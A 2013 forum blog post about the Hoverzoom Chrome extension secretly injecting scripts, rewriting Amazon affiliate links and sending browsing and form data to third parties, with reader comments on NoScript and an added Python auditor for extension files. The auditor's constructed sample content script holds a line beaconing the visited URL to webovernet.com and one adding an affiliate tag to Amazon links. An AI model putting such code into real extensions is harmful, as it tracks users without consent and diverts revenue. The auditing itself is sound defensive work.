Ramblings of an old Doc


Several days ago, a thread on Reddit claimed Hoverzoom was malware. The same claim had apparently surfaced several months earlier. Apparently it sent info back to some ad agency (if that was indeed an ad agency). It was claimed that only ‘unusual domain names’ were ‘tested’, and that the data collected was ‘anonymous’. Sure. Then it was claimed that a script to disable that would be added.

Testing of the extension revealed:

  1. Hoverzoom injects code into some or all of the web pages you visit while the extension is running.
  2. Hoverzoom modifies "certain Amazon links" on all websites you visit, adding its own affiliate ID.
  3. The extension sends the browsing habits that it collects to a third party website (webovernet.com and jsl.blankbase.com).
  4. It sends domain misspellings to another third party website (advisormedia.cz).
  5. All monetization schemes are active by default.
  6. On December 17, version 4.27 was released which submits what you type into web forms to a third party website (qp.rhlp.co).
  7. On December 18, version 4.28 was released that removed the script again that was added on December 17.

Unethical at best, creepy at worst. Supposedly the script was also injected into any site you visited. Does this dev think he’s the NSA?
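The findings above are the kind of thing you can check for yourself in an unpacked extension. The script below is an added example, not code from the post or from Hoverzoom: it flags content scripts that match every page, third-party hosts named in the script source, and Amazon link rewriting with an affiliate tag. The manifest and script source are constructed samples shaped like a Chrome manifest.json and content script; the hostnames are the ones the post names, and the audit function name is my own.

```python
import re

# Constructed sample in the shape of a Chrome extension manifest.json
# (illustrative values, not Hoverzoom's real manifest).
SAMPLE_MANIFEST = {
    "name": "sample-image-zoomer",
    "version": "4.27",
    "permissions": ["tabs", "storage"],
    "content_scripts": [
        {"matches": ["<all_urls>"], "js": ["inject.js"], "run_at": "document_end"}
    ],
}

# Constructed sample content-script source; webovernet.com is a host the post names.
SAMPLE_SCRIPTS = {
    "inject.js": (
        "document.querySelectorAll('a[href*=\"amazon.\"]').forEach(function(a){"
        "a.href += (a.href.indexOf('?') < 0 ? '?' : '&') + 'tag=partner-20';});\n"
        "var img = new Image(); img.src = 'http://webovernet.com/log?u=' + "
        "encodeURIComponent(location.href);\n"
    ),
}

# Match patterns that inject a content script into every page the user visits.
BROAD_MATCHES = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
URL_RE = re.compile(r"https?://([a-z0-9.-]+)", re.IGNORECASE)


def audit_extension(manifest, scripts, own_domains=()):
    """Return human-readable findings for an unpacked extension.

    manifest: parsed manifest.json; scripts: {filename: source text};
    own_domains: hostnames the extension legitimately talks to (assumed known).
    """
    findings = []
    for cs in manifest.get("content_scripts", []):
        broad = BROAD_MATCHES.intersection(cs.get("matches", []))
        if broad:
            findings.append("content script %s runs on every page (%s)"
                            % (", ".join(cs.get("js", [])), ", ".join(sorted(broad))))
    for name, src in scripts.items():
        for host in sorted({h.lower() for h in URL_RE.findall(src)}):
            if host not in own_domains:
                findings.append("%s contacts third-party host %s" % (name, host))
        if "amazon." in src.lower() and re.search(r"\btag=", src):
            findings.append("%s rewrites Amazon links with an affiliate tag" % name)
    return findings


if __name__ == "__main__":
    for finding in audit_extension(SAMPLE_MANIFEST, SAMPLE_SCRIPTS):
        print("-", finding)
```

Point it at the real files by loading manifest.json with json.load and reading each file listed under content_scripts into the scripts dict.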

Anyway, I have divested Chrome of this extension. Chrome Web Store (or the extension’s author) has removed Hoverzoom as well. I’m now using Imagus.

Ghacks recommends keeping an eye on the extensions you use…they could well be spying on you. I wish I could recommend one that works well with WC.

Perhaps Kryo might know one which works with Firefox, Chrome and WC as well.

Noscript and extensions like it prevent browsers from making automatic connections. Unfortunately, NoScript does not interact well with WC.

My thanks to Martin Brinkmann at Ghacks.net for reviewing this topic.

Source:

http://www.ghacks.net/2013/12/26/hoverzooms-malware-controversy-imagus-alternative/?_m=3n%2e0038%2e1106%2ehj0ao01hy5%2e154q


Comments
on Dec 26, 2013

WC has embedded the image link on; I doubt there is any extension that would work. Yet this is only constrained to the forum; the gallery is fine though, as I used an alternative extension: Hover Free.

on Dec 26, 2013

From looking over that article and glancing at the code in question, I don't think that noscript would be effective against that sort of attack. In this case the script is not being hosted externally and referenced in the actual page, but hosted in memory and injected by the browser itself, so it really depends on how/when it does that (I'm not familiar with chrome extensions, and that appears to be native functionality of the chrome extension API). I could be wrong though since I can only assume based on the way it works in firefox.

Noscript would only be able to stop it if it actually injects a script tag referencing some URI that can be blocked to the page content itself before it hits the rendering engine. But I would suspect it works more like Greasemonkey does where scripts are just run in the page context after they are rendered (at which point noscript does not even know about it). And noscript has never been able to block anything directly embedded in the page (in case it does it that way), only external references.

Certainly noscript could have some special functionality just for scenarios like this (I believe it does stuff like block cross-domain form posts to prevent XSS, but this particular case was using GETs). They did use to have support for blocking external references into packaged files in extensions in firefox but that was since removed. Assumably there is some base feature for that now but I'm not familiar with it--haven't written firefox extensions in a long time.

on Dec 26, 2013

Thanks for the fast response, kryo. I'll direct Martin Brinkmann's attention to your thoughts. My only purpose was to alert folks using the extension that their info was being taken without express consent...which is not ethical, imo.

on Dec 26, 2013

Noscript is pretty handy in general to preemptively protect against ad-borne attacks (which represent a substantial number of them these days) though. But part of living with it is being able to deal with whitelisting sites you trust so that they work fully/correctly. And it can be a tough decision when your own security is pitted against your favorite sites' income stream because of ads.

Fortunately, I believe we only run locally-hosted ads for our own products here nowadays, so there is no risk or concern for users to whitelist us if they are using such extensions. It would be nice if more sites did the same, though.

on Dec 26, 2013

Noscript and extensions like it prevent browsers from making automatic connections. Unfortunately, NoScript does not interact well with WC.

Not sure in what way it doesn't interact well, Doc. Can you elaborate?

I've never run into any issues with WC and NoScript, but then I've trusted WC.

on Dec 26, 2013

When I used NoScript, I had to whitelist the site, same with Adblock/Adblock Plus... the problem I encountered was with the Gallery and responses.

on Dec 26, 2013

I use Chrome exclusively now and this is the first time I'm hearing about this Hoverzoom. I only have two extensions...the one ASC puts there and Hitman Pro. That's it.

on Dec 26, 2013

Unless you are the most patient person on the planet, whitelisting is the only way to use NoScript effectively. I know any site can be compromised, but sometimes ya just gotta have a little faith.

on Dec 28, 2013

Only 'addon' I have in Chrome is donottrackplus.

Only 'addons' I have in IE9 [cannot use 10 or 11...fucks FSX you moron Microsoft] are donottrackplus and tineye.


Always work on the idea you don't NEED addons....